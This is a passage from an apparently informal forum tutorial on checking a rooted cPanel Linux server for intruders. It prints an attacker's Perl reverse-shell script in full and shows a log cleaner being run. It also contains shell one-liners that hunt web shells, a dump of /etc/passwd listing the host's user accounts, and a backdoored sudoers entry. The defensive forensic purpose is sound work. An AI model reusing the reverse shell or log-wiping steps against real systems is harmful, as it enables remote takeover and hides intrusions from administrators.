sess_2885b9ccae75e82fffcd23380f1cfb35 -rw------- 1 racimax racimax 37 20 apr 09.48 sess_29d5fafde1b7d71bf217ee33f70c4436 -rw------- 1 kyrksido kyrksido 292 24 mar 00.55 sess_29f6e5680d6ba6edb6c2e72ab4083e81 -rw------- 1 kyrksido kyrksido 6936 10 mar 09.43 sess_2a505c553a33adf1db0a554fa147daa6 -rw------- 1 pomonan pomonan 1997 24 okt 2008 sess_2ab33658b554d72743eff8c5d159860c -rw------- 1 kyrksido kyrksido 292 17 apr 14.36 sess_2b1ec955a6ac2f233d2a1665eefd0202 -rw------- 1 kyrksido kyrksido 292 29 mar 10.27 sess_2bd5d11d1518371c3931d8f6dd1d0060 -rw------- 1 kyrksido kyrksido 2043 18 mar 00.38 sess_2c511c627d11a6b0cafd87b6b79de524 -rw------- 1 ninibse ninibse 222 22 apr 03.58 sess_2ded53729f38699819ea3c05c34c61f6 -rw------- 1 ninibse ninibse 221 22 apr 03.53 sess_300fd04ce0fa1f6018ab064ef5119ffc -rw------- 1 wiisidan wiisidan 0 22 apr 03.52 sess_311d57db5125b48f4d1d23c6d03a43d3 -rw------- 1 kyrksido kyrksido 292 20 apr 15.50 sess_34e3631c8946d726267af8b644621009 -rw------- 1 ninibse ninibse 245 22 apr 03.46 sess_38ad783e8efbdbb5b944d85233747568 -rw------- 1 kyrksido kyrksido 302 17 mar 04.56 sess_3968853dddb97fed4ebc5403fd9cefdb -rw------- 1 salmonss salmonss 98 29 okt 10.39 sess_39f253d4b60387f1df89e7cf533244b3 -rw------- 1 kyrksido kyrksido 292 20 mar 20.59 sess_3b9eac66d85eea20bf066e84579ec83e -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_3ccba69b23b6f05a5365122f8bbea0b9 -rw------- 1 wiisidan wiisidan 0 22 apr 03.38 sess_3d0c7f531bbcd701fb3a6d6f35c6c661 -rw------- 1 ninibse ninibse 237 22 apr 03.48 sess_3da8ebcf9d2e6adc6f83865580bb6dde -rw------- 1 kyrksido kyrksido 21 9 apr 04.37 sess_3efdaafe09ed623304414757e41a6ea8 -rw------- 1 kyrksido kyrksido 2144 24 mar 04.02 sess_4193f230f708df31ff64b378458fd61e -rw------- 1 kyrksido kyrksido 292 12 mar 00.30 sess_42e38c565f50c608ce9a084b463c43e9 -rw------- 1 kyrksido kyrksido 0 28 mar 10.42 sess_455c138c33ee71e1ebeb19c6d3b1f1b5 -rw------- 1 wiisidan wiisidan 0 22 apr 04.01 sess_45d02fa09bc902bbc4c99c14edac6aff -rw------- 1 kyrksido kyrksido 3053 14 mar 16.20 sess_47aa1ea22a3df8847cbe6d9a57af9dbc -rw------- 1 kyrksido kyrksido 2144 28 mar 10.42 sess_484e21aaf3f20dffeffd2c99e58419ac -rw------- 1 kyrksido kyrksido 3053 15 mar 16.31 sess_48999a05f4aeee51e2231f87d31f262a -rw------- 1 ninibse ninibse 465 22 apr 04.03 sess_4a08293870b6973e03546fb1222570c4 -rw------- 1 racimax racimax 37 20 apr 17.28 sess_4b42a8c6ffa85df6fbe6cdc9bcd9b9a6 -rw------- 1 ihjmedia ihjmedia 254 10 dec 10.30 sess_4e0235f7fe2c620ff3e310dbe199042a -rw------- 1 kyrksido kyrksido 2043 10 mar 03.16 sess_506ce1d592bbaeb1f3d33758626f9d23 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_507480142cb75f46bc5f8f00a15e6f87 -rw------- 1 kyrksido kyrksido 837 14 apr 10.54 sess_522ad27c109eb935b8ddf3ae9ad2c3ce -rw------- 1 ninibse ninibse 230 22 apr 04.04 sess_5293a7bc2062a857583fd73fbf3ca2b6 -rw------- 1 salmonss salmonss 98 29 okt 10.39 sess_5693c216d3c943cd8f4c811a7f183993 -rw------- 1 kyrksido kyrksido 3053 12 mar 22.35 sess_5845d1c8cc3797583bbdfe0337f86357 -rw------- 1 ninibse ninibse 254 22 apr 04.02 sess_59d589a8fff0a0c7047684cf1071dbab -rw------- 1 finelady finelady 2539 26 okt 2008 sess_5ea426e540e242af22d3920e2b58a0e0 -rw------- 1 kyrksido kyrksido 0 18 apr 19.06 sess_5f695062da75093867923f2a25001849 -rw------- 1 salmonss salmonss 18254 16 feb 10.52 sess_61581059cf3003346e0932ef640db63b -rw------- 1 racimax racimax 78 21 apr 22.22 sess_633ae5c8052cfb4e2b431de2612009fd -rw------- 1 kyrksido kyrksido 3078 21 mar 01.20 sess_63edc817f7e1ad2ddb37697a42f1ad8a -rw------- 1 kyrksido kyrksido 3053 28 mar 10.43 sess_65d36ba74ba83ea91ef84d38b6d9e386 -rw------- 1 kyrksido kyrksido 292 11 mar 19.46 sess_66d6adccb21ddb3b9b7e9cb20f45e676 -rw------- 1 kyrksido kyrksido 3053 14 mar 18.19 sess_670af20c106e4168934dbc83e43a93ce -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_691b5a17a5d247378b220ec491d5ee16 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_69303182624f8c226cff6587eb9062cc -rw------- 1 kyrksido kyrksido 2043 28 mar 10.42 sess_69f3cdf0e2064a6afc9eb8ae022800b8 -rw------- 1 kyrksido kyrksido 2144 15 mar 16.31 sess_6b785460a34189eb5011f9a2ce2b4169 -rw------- 1 kyrksido kyrksido 3273 7 apr 16.58 sess_6c858a2c991f2f2e5d5e1fa302bf9db8 -rw------- 1 kyrksido kyrksido 0 12 mar 01.07 sess_6d281866a78bcae39810621c7980db13 -rw------- 1 kyrksido kyrksido 2043 20 apr 15.50 sess_6ec033644129b99e1583f3bd7d24cb9b -rw------- 1 salmonss salmonss 388207 29 okt 10.35 sess_6fda80a51272793ecbb5f7e60179ec2b -rw------- 1 racimax racimax 78 21 apr 19.43 sess_71e3b987ea2ced362c937a1201c24513 -rw------- 1 wiisidan wiisidan 0 22 apr 03.38 sess_7247875d2ef2ea2d3730dfadecde3346 -rw------- 1 salmonss salmonss 18325 28 jan 18.09 sess_73c86a5ca33c341d902dffac391a96fd -rw------- 1 kyrksido kyrksido 837 9 apr 04.37 sess_74072bc6bdc47a2537e43bd1dac31be5 -rw------- 1 kyrksido kyrksido 292 21 apr 05.03 sess_75080bb8d12da852dd0e02edd02f857a -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_76bc72933acb6feee31ed7eac88a3e6a -rw------- 1 ninibse ninibse 254 22 apr 03.55 sess_779af487e61473518288307773fe5376 -rw------- 1 ninibse ninibse 228 22 apr 03.50 sess_77d1487fff64ee99ddfb079ffe12d0e6 -rw------- 1 kyrksido kyrksido 0 11 mar 09.59 sess_799367eb1bc44566eb1728988ae270b5 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_79abdeac80f959af174f789294db1301 -rw------- 1 kyrksido kyrksido 2144 12 mar 22.35 sess_7a037085bb9c4f2418cde6a39951a5d0 -rw------- 1 kyrksido kyrksido 292 28 mar 10.42 sess_7ac45c39f528add43f8f55ce256d41ee -rw------- 1 kyrksido kyrksido 21 3 apr 18.55 sess_7aea4c557935919a575b55be86c68f4a -rw------- 1 kyrksido kyrksido 292 3 apr 18.55 sess_7b4792f62895ae2ca3fcd1338bf08137 -rw------- 1 salmonss salmonss 2792 22 nov 20.54 sess_7db240c3ed3034ef4a996b13b6bd0c00 -rw------- 1 kyrksido kyrksido 292 9 apr 04.37 sess_7e95ef89883bb99d692dd65cd0938492 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_81df7c34f9f860ae27198dbe0cc8c738 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_82b3548634af1fde9e83c3872c752acf -rw------- 1 kyrksido kyrksido 2144 11 mar 23.40 sess_887e763e18c894a6b1e5deaa1509a8e3 -rw------- 1 kyrksido kyrksido 0 17 apr 00.31 sess_8a3a6c521d2723c5d8f15f6b54abd611 -rw------- 1 rifixse rifixse 94 18 apr 11.09 sess_8ac2e598d298f2a309d89278f8410d75 -rw------- 1 kyrksido kyrksido 302 22 mar 05.14 sess_8b1c841274e88c0049955e2fac70dd8e -rw------- 1 kyrksido kyrksido 2144 9 apr 20.43 sess_8bb686c847dc0a7e9f9df5d06a76b178 -rw------- 1 finelady finelady 7133 30 jul 2008 sess_8bdf81a98d8b8380737128798abf4f24 -rw------- 1 kyrksido kyrksido 292 17 apr 14.36 sess_901f45266fb7e515eaee93c0c7a10389 -rw------- 1 kyrksido kyrksido 2144 14 mar 16.20 sess_94da78c2004a37981e1890e471cfaa11 -rw------- 1 ninibse ninibse 236 22 apr 04.09 sess_955394cacfa084e1813379c074225adf -rw------- 1 kyrksido kyrksido 292 4 apr 19.26 sess_95a9f548162e9391ff862f89f03b1794 -rw------- 1 salmonss salmonss 410731 9 nov 13.28 sess_96fe3a5caf806e4dc398fb18e3cc5bb2 -rw------- 1 kyrksido kyrksido 3053 15 mar 21.02 sess_97592999c743991304bbeea4656ca85d -rw------- 1 ninibse ninibse 250 22 apr 04.05 sess_9c69b2cd2552a707f8466aaddfa979e2 -rw------- 1 kyrksido kyrksido 0 20 apr 15.50 sess_a0e067032ce36e3473285c2244b0c799 -rw------- 1 finelady finelady 34680 11 jun 2009 sess_a3e9b2a735ca1d3e4cbb6e7f2980b388 -rw------- 1 kyrksido kyrksido 4815 9 apr 10.31 sess_a475487733099755b75563546a1519a4 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_a762f2a663b82b42e8db9e93b9cd3de7 -rw------- 1 ninibse ninibse 242 22 apr 03.43 sess_a78beb17701757d52050e208d9ebeeca -rw------- 1 kyrksido kyrksido 292 20 apr 15.50 sess_a8ae0d6133fc2b24cacb004112b30f10 -rw------- 1 kyrksido kyrksido 292 23 mar 21.36 sess_aa2e88c0a40b2efa07dfb58bf83dc1f6 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_aa3d6406b2aa82d96ce6682a48d5546d -rw------- 1 kyrksido kyrksido 302 7 apr 20.00 sess_aa6da13d7f459075163ab70f32491a53 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_ab8c002a551d69679daea2953e4e86f6 -rw------- 1 kyrksido kyrksido 2144 14 mar 18.19 sess_ac22e4f91539ed4d1f4daf1351039ee5 -rw------- 1 ninibse ninibse 255 22 apr 03.52 sess_ad17494d739d90543e0439f3c4a2e6ea -rw------- 1 kyrksido kyrksido 292 6 apr 03.53 sess_aeeec6769bdcbd50590c2dce3a04cb98 -rw------- 1 racimax racimax 78 22 apr 01.48 sess_b1947b727801edf709aaef0cde725524 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_b3c0c8416e4616101908929f7ee6bf8a -rw------- 1 kyrksido kyrksido 292 23 mar 07.34 sess_b561d289ee2677aa84f76492229f36b6 -rw------- 1 ninibse ninibse 224 22 apr 03.44 sess_b7409da106ff563fc9160048cd4a1b8c -rw------- 1 kyrksido kyrksido 0 20 apr 15.50 sess_b780729066e1f389c9aaa0a1fa514b2c -rw------- 1 kyrksido kyrksido 3053 9 mar 12.51 sess_b9e502f344854fcc60536e18502de4c2 -rw------- 1 rifixse rifixse 94 13 apr 18.19 sess_bab57d650240abbd4903b4c7ad0497f4 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_bc41ff585bff90feb1b3f39a237f74cd -rw------- 1 kyrksido kyrksido 302 11 mar 06.07 sess_bcf2f1a8dca8e2f5c84dd3e564f514f6 -rw------- 1 kyrksido kyrksido 292 14 apr 10.54 sess_bcf733d91484438ae6e66e55d6fa9fec -rw------- 1 kyrksido kyrksido 0 20 apr 15.50 sess_bd704adb4bdd3ebe4611dd55c2bedf4d -rw------- 1 ninibse ninibse 254 22 apr 03.59 sess_bf55031419d0b562f43d73852c6bc8fb -rw------- 1 kyrksido kyrksido 837 20 apr 15.50 sess_c0cd23dc847abc58d9da976bac4e0640 -rw------- 1 ninibse ninibse 238 22 apr 03.45 sess_c161948a4164c8d0e91c99df5058c706 -rw------- 1 kyrksido kyrksido 837 3 apr 18.55 sess_c54e858c0cf7499c44af267ec9a9a607 -rw------- 1 wiisidan wiisidan 0 22 apr 03.49 sess_c9fc755dbfac31e963d6025837815c30 -rw------- 1 ninibse ninibse 234 22 apr 03.49 sess_cb687483f0e0a3500317e94ba1bb2f49 -rw------- 1 ninibse ninibse 237 22 apr 03.51 sess_cc4077eb4e56e10de4b816a4c844ed2d -rw------- 1 kyrksido kyrksido 3833 20 apr 15.50 sess_d3276607d840b316330b9163d60c3d20 -rw------- 1 kyrksido kyrksido 2144 9 mar 12.50 sess_d4de62103a13fe502f1fdd4a5f09c4c1 -rw------- 1 salmonss salmonss 387024 29 okt 17.03 sess_d5a45864fc730b68d7a583cdf20dcd5a -rw------- 1 kyrksido kyrksido 292 23 mar 21.36 sess_d5efed981a69885f653e4e73cfcbfff4 -rw------- 1 ninibse ninibse 224 22 apr 04.00 sess_d6cc76acd547b560f9b2774bce374b11 -rw------- 1 kyrksido kyrksido 3833 10 mar 23.57 sess_d80acad92182a17b23b21c709240d064 -rw------- 1 kyrksido kyrksido 3273 6 apr 07.59 sess_da958b4f6cb11b745b77a1edc5a61850 -rw------- 1 kyrksido kyrksido 21 14 apr 10.54 sess_da962cb333b6e3f08e9687fc754a5aa1 -rw------- 1 kyrksido kyrksido 292 9 mar 23.29 sess_dac6a0e0b6015bf5e8e366d63c8e6cbd -rw------- 1 ninibse ninibse 247 22 apr 03.54 sess_db23a4ff5b01f9a81f590bcfb79bda02 -rw------- 1 salmonss salmonss 399369 4 nov 08.39 sess_dbe98d7f4d5036f389a0b6df6327779b -rw------- 1 ihjmedia ihjmedia 251 2 dec 11.20 sess_dd3e87d49c7672a6e0135e0fefce1c88 -rw------- 1 ninibse ninibse 237 22 apr 04.08 sess_dd4a67afa3a67a37d020416ab56db8aa -rw------- 1 kyrksido kyrksido 0 28 mar 10.42 sess_dffd0c164075992fa0da5eb6359ec8ae -rw------- 1 kyrksido kyrksido 0 10 mar 03.16 sess_e1f530fa8314510a4e6e67d90117a584 -rw------- 1 salmonss salmonss 400300 1 nov 15.18 sess_e22cd6d922ef7fa1b44c55922addf7d2 -rw------- 1 ihjmedia ihjmedia 254 11 jan 10.49 sess_e3e6487d12366430538b2375e65154b6 -rw------- 1 kyrksido kyrksido 292 23 mar 03.31 sess_e63c5bd1903c80d9e3132042f065f26e -rw------- 1 ninibse ninibse 256 22 apr 03.56 sess_e98c1d77117331a101b067e078575462 -rw------- 1 salmonss salmonss 408216 13 nov 17.18 sess_eac8ce8407103adfe9a91f7a6dab8f86 -rw------- 1 kyrksido kyrksido 2043 18 apr 19.06 sess_eccaaaf8c5a0f0836114db7266cfae89 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_ed0d26c0507b04314f6b8b0a1f822c4a -rw------- 1 kyrksido kyrksido 2674 10 mar 14.37 sess_ef2d25a38e6ef1c400c922f9285a49aa -rw------- 1 kyrksido kyrksido 3053 11 mar 23.40 sess_f16bf22bb3a8783263634f1cb21dd345 -rw------- 1 ihjmedia ihjmedia 254 2 dec 09.42 sess_f182c141f88e9f76924baab231e7ba9c -rw------- 1 kyrksido kyrksido 3273 20 apr 15.50 sess_f29142d6d84999e800ab13221906f95e -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_f33eb5c8b0656b68889e8c59a5cf3336 -rw------- 1 kyrksido kyrksido 3053 22 mar 06.56 sess_f45193fe7e986b15edc058c2129945e3 -rw------- 1 kyrksido kyrksido 2144 22 mar 06.56 sess_f65d6d57f41263c6fd857f24369e1bda -rw------- 1 kyrksido kyrksido 6936 18 apr 19.06 sess_f6fcd412a0f1049fdbfce6d698aa06ac -rw------- 1 ninibse ninibse 242 22 apr 04.06 sess_f778169755c4a09ae1cfc63e4741af54 -rw------- 1 kyrksido kyrksido 292 16 mar 19.44 sess_fbc68557bb941efc51c35cb341184a48 -rw------- 1 datorins datorins 1175 17 apr 2008 sess_fc03194ac193825d3822b7d2e1070531 -rw------- 1 kyrksido kyrksido 292 17 apr 09.17 sess_ff66f7cd17a1f7d4b6ac376bfb114021 -rw------- 1 kyrksido kyrksido 3053 9 apr 20.43 sess_ffd28b277247b187ddb92b1cf855cb9f -rw-r--r-- 1 racimax racimax 48583 10 mar 17.50 shell1047 drwxr-xr-x 5 12 users 1024 11 okt 2009 sploit2009 -rw-r--r-- 1 12 users 70101 15 jan 19.08 sploit2009.tgz -rw-r--r-- 1 racimax racimax 3430 26 mar 16.06 temp.log -rw-r--r-- 1 racimax racimax 27302 8 okt 2009 tmp2217 -rw-r--r-- 1 racimax racimax 98519 13 apr 15.19 xem076d24c.txt [/code] lol :)) what's this: -rw-r--r-- 1 racimax racimax 541 18 apr 19.42 back -rwxr-xr-x 1 racimax racimax 6241 18 apr 19.43 backc -rwxr-xr-x 1 racimax racimax 5748 17 apr 22.23 bc -rw-r--r-- 1 racimax racimax 438 17 apr 22.23 bc.pl See that possible malicious attacker on our box ? :)) hmm let's check what is bc.pl :)) [code] mywisdom@31337~#cat bc.pl #!/usr/bin/perl use Socket; $iaddr=inet_aton($ARGV[0]) || die("Error: $!\n"); $paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system('/bin/sh -i'); close(STDIN); close(STDOUT); close(STDERR); mywisdom@31337~# [/code] lol it's clear that it's a back connect in perl :)) Ok next find for possible c99 or r57 backdoors on your server: [code] find /home/ -name "*".php -type f -print0 | xargs -0 grep c99 | uniq -c | sort -u | cut -d":" -f1 | awk '{print "rm -rf " $2}' | uniq find /home/ -name "*".php -type f -print0 | xargs -0 grep r57 | uniq -c | sort -u | cut -d":" -f1 | awk '{print "rm -rf " $2}' | uniq [/code] u may modify this to find other shells, sample list of backdoors u can see at :www.saldiri.org there are so many others like : b374k.php, devshell, atlantiq, etc, so many2 backdoors we can write all them here. Then u may manually check for strange things, ok let's see /etc/passwd at first: [code] mywisdom@d3v1l~#cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:0:0:games:/usr/games:/bin/bash gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin cpanel:x:32001:32001::/usr/local/cpanel:/bin/false mysql:x:0:101:MySQL server:/var/lib/mysql:/bin/bash mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false cpanel-horde:x:32003:32005::/var/cpanel/userhomes/cpanel-horde:/usr/local/cpanel/bin/noshell cpanel-phpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanel-phpmyadmin:/usr/local/cpanel/bin/noshell cpanel-phppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanel-phppgadmin:/usr/local/cpanel/bin/noshell ihjmedia:x:32006:32008::/home/ihjmedia:/bin/bash aluminiu:x:32007:32009::/home/aluminiu:/bin/bash ventilat:x:32008:32010::/home/ventilat:/bin/bash alltomdi:x:32009:32011::/home/alltomdi:/bin/bash luftfart:x:32010:32012::/home/luftfart:/bin/bash guldkloc:x:32011:32013::/home/guldkloc:/bin/bash folkhogs:x:32012:32014::/home/folkhogs:/bin/bash reformat:x:32013:32015::/home/reformat:/bin/bash alltomha:x:32014:32016::/home/alltomha:/bin/bash datorins:x:32015:32017::/home/datorins:/bin/bash kyrkforu:x:32016:32018::/home/kyrkforu:/bin/sh janzzon:x:32017:32019::/home/janzzon:/bin/bash ninibse:x:32018:32020::/home/ninibse:/bin/bash racimax:x:32019:32021::/home/racimax:/bin/bash pirense:x:32020:32022::/home/pirense:/bin/bash medieb:x:32021:32023::/home/medieb:/bin/bash bralinse:x:32022:32024::/home/bralinse:/bin/bash mtek:x:32023:32025::/home/mtek:/bin/bash perbrahe:x:32024:32026::/home/perbrahe:/bin/bash salmonss:x:32025:32027::/home/salmonss:/bin/bash bolagsfo:x:32026:32028::/home/bolagsfo:/bin/bash kyrksido:x:32027:32029::/home/kyrksido:/bin/bash finelady:x:32028:32030::/home/finelady:/bin/bash accelera:x:32029:32031::/home/accelera:/bin/bash wiisidan:x:32030:32032::/home/wiisidan:/bin/bash colorita:x:32031:32033::/home/colorita:/bin/bash pomonan:x:32032:32034::/home/pomonan:/usr/local/cpanel/bin/noshell storgard:x:32033:32035::/home/storgard:/bin/bash alltomch:x:32034:32036::/home/alltomch:/bin/bash toworkse:x:32035:32037::/home/toworkse:/bin/bash friskare:x:32036:32038::/home/friskare:/bin/bash atlas:x:32037:32039::/home/atlas:/bin/bash bienveni:x:32038:32040::/home/bienveni:/bin/bash psykosyn:x:32039:32041::/home/psykosyn:/bin/bash juldagen:x:32040:32042::/home/juldagen:/bin/bash kondomgu:x:32041:32043::/home/kondomgu:/bin/bash loveline:x:32042:32044::/home/loveline:/bin/bash partysho:x:32043:32045::/home/partysho:/bin/bash xnrsre:x:32044:32046::/home/xnrsre:/bin/bash rifixse:x:32045:32047::/home/rifixse:/bin/bash saldaxs:x:32046:32048::/home/saldaxs:/bin/bash bioevalu:x:32047:32049::/home/bioevalu:/bin/bash handana:x:32048:32050::/home/handana:/bin/bash blaskap:x:32049:32051::/home/blaskap:/bin/bash devel121:x:32050:32052::/home/devel121:/bin/bash xnfrsl:x:32051:32053::/home/xnfrsl:/bin/bash akespers:x:32052:32054::/home/akespers:/bin/bash joafro:x:32053:32055::/home/joafro:/bin/bash cpanelhorde:x:32054:32056::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell cpanelphpmyadmin:x:32055:32057::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell cpanelphppgadmin:x:32056:32058::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell cpanelroundcube:x:32057:32059::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell menacemu:x:510:510::/home/menacemu:/bin/bash annalena:x:511:511::/home/annalena:/bin/bash allthals:x:512:512::/home/allthals:/bin/bash simonfra:x:504:500::/home/simonfra:/bin/bash wheel:x:0:0::/home/wheel:/bin/bash [/code] suspected line was here if u never adduser wheel as root: wheel:x:0:0::/home/wheel:/bin/bash Then you may check for lastlog: [code] lastlog [/code] ok let's go [code] mywisdom@d3v1l~#lastlog Anv??ndarnamn Port Fr??n Senast root pts/1 attacker_ip tor apr 22 04:27:52 +0200 2010 bin **Aldrig varit inloggad** xnfrsl **Aldrig varit inloggad** akespers **Aldrig varit inloggad** joafro **Aldrig varit inloggad** menacemu **Aldrig varit inloggad** annalena **Aldrig varit inloggad** allthals **Aldrig varit inloggad** simonfra **Aldrig varit inloggad** wheel pts/1 attacker_ip tor apr 22 04:27:52 +0200 2010 [/code] wow our attacker has rooted our box :)) Before we delete we must check what he has done: [code] cat /home/wheel/.bash_history [/code] deleting intruder: [code] userdel wheel [/code] :)) lol then u may check for logs at /var/logs: [code] mywisdom@d3v1l~#ls acpid cron.2 httpd sa anaconda.log cron.3 lastlog samba anaconda.syslog cron.4 lfd.log scrollkeeper.log anaconda.xlog cups lfd.log.1.gz secure audit dcpumon maillog secure.1 bandwidth dmesg maillog.1 secure.2 boot.log exim_mainlog maillog.2 secure.3 boot.log.1 exim_mainlog.1.gz maillog.3 secure.4 boot.log.2 exim_mainlog.2.gz maillog.4 setroubleshoot boot.log.3 exim_mainlog.3.gz messages spooler boot.log.4 exim_mainlog.4.gz messages.1 spooler.1 btmp exim_paniclog messages.2 spooler.2 checkphpv_error.log exim_paniclog.1.gz messages.3 spooler.3 checkphpv_output.log exim_paniclog.2.gz messages.4 spooler.4 chkservd.log exim_paniclog.3.gz pm squid conman exim_paniclog.4.gz ppp stunnel-4.15-build.log conman.old exim_rejectlog prelink tallylog cpanel-install-thread0.log exim_rejectlog.1.gz rpmpkgs wtmp cpanel-install-thread1.log exim_rejectlog.2.gz rpmpkgs.1 xferlog cpupdate.env exim_rejectlog.3.gz rpmpkgs.2 xferlog.offset cron exim_rejectlog.4.gz rpmpkgs.3 xferlog.offsetftpsep cron.1 faillog rpmpkgs.4 yum.log mywisdom@d3v1l~# [/code] Desc: access_log -> logs for httpd messages -> checking alert from syslogd utmp & wtmp -> who is on your server (u may also type w or who) xferlog -> ftp daemon logs sulog -> checking su logs acct -> user activity logs etc... then let's see whether our sudo has been backdoored, let's see [code] mywisdom@d3v1l~#cat /etc/sudoers ## Sudoers allows particular users to run various commands as ## the root user, without needing the root password. ## ## Examples are provided at the bottom of the file for collections ## of related commands, which can then be delegated out to particular ## users or groups. ## ## This file must be edited with the 'visudo' command. ## Host Aliases ## Groups of machines. You may prefer to use hostnames (perhap using ## wildcards for entire domains) or IP addresses instead. # Host_Alias FILESERVERS = fs1, fs2 # Host_Alias MAILSERVERS = smtp, smtp2 ## User Aliases ## These aren't often necessary, as you can use regular groups ## (ie, from files, LDAP, NIS, etc) in this file - just use %groupname ## rather than USERALIAS # User_Alias ADMINS = jsmith, mikem ## Command Aliases ## These are groups of related commands... ## Networking Cmnd_Alias NETWORKING = /sbin/route, /sbin/ifconfig, /bin/ping, /sbin/dhclient, /usr/bin/net, /sbin/iptables, /usr/bin/rfcomm, /usr/bin/wvdial, /sbin/iwconfig, /sbin/mii-tool ## Installation and management of software Cmnd_Alias SOFTWARE = /bin/rpm, /usr/bin/up2date, /usr/bin/yum ## Services Cmnd_Alias SERVICES = /sbin/service, /sbin/chkconfig ## Updating the locate database Cmnd_Alias LOCATE = /usr/sbin/updatedb ## Storage Cmnd_Alias STORAGE = /sbin/fdisk, /sbin/sfdisk, /sbin/parted, /sbin/partprobe, /bin/mount, /bin/umount ## Delegating permissions Cmnd_Alias DELEGATING = /usr/sbin/visudo, /bin/chown, /bin/chmod, /bin/chgrp ## Processes Cmnd_Alias PROCESSES = /bin/nice, /bin/kill, /usr/bin/kill, /usr/bin/killall ## Drivers Cmnd_Alias DRIVERS = /sbin/modprobe # Defaults specification # # Disable "ssh hostname sudo ", because it will show the password in clear. # You have to run "ssh -t hostname sudo ". # Defaults requiretty Defaults env_reset Defaults env_keep = "COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR \ LS_COLORS MAIL PS1 PS2 QTDIR USERNAME \ LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION \ LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC \ LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS \ _XKB_CHARSET XAUTHORITY" ## Next comes the main part: which users can run what software on ## which machines (the sudoers file can be shared between multiple ## systems). ## Syntax: ## ## user MACHINE=COMMANDS ## ## The COMMANDS section may have other options added to it. ## ## Allow root to run any commands anywhere root ALL=(ALL) ALL wheel ALL = NOPASSWD: ALL mywisdom@d3v1l~# [/code] ooopssss wheel ALL = NOPASSWD: ALL -> have u ever add this for sudo no password??? then we may check for possible log cleaners on our system ok here's a simple emo of a log cleaner: [code] mywisdom@d3v1l~#w 05:16:48 up 128 days, 18:20, 1 user, load average: 0,82, 0,93, 0,98 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT mysql pts/1 111.94.9.51 04:27 0.00s 0.13s 0.11s w mywisdom@d3v1l~#./vanish mysql localhost ip utmp target processed. wtmp target processed. lastlog target processed. Processing /var/log/messages DONE. Processing /var/log/secure DONE. Processing /var/log/xferlog DONE. Processing /var/log/maillog DONE. Processing /var/log/warn Couldn't open /var/log/warn Processing /var/log/mail Couldn't open /var/log/mail Processing /var/log/httpd.access_log Couldn't open /var/log/httpd.access_log Processing /var/log/httpd.error_log Couldn't open /var/log/httpd.error_log mv: kan inte ta status p?? "warn.hm": Filen eller katalogen finns inte mv: kan inte ta status p?? "mail.hm": Filen eller 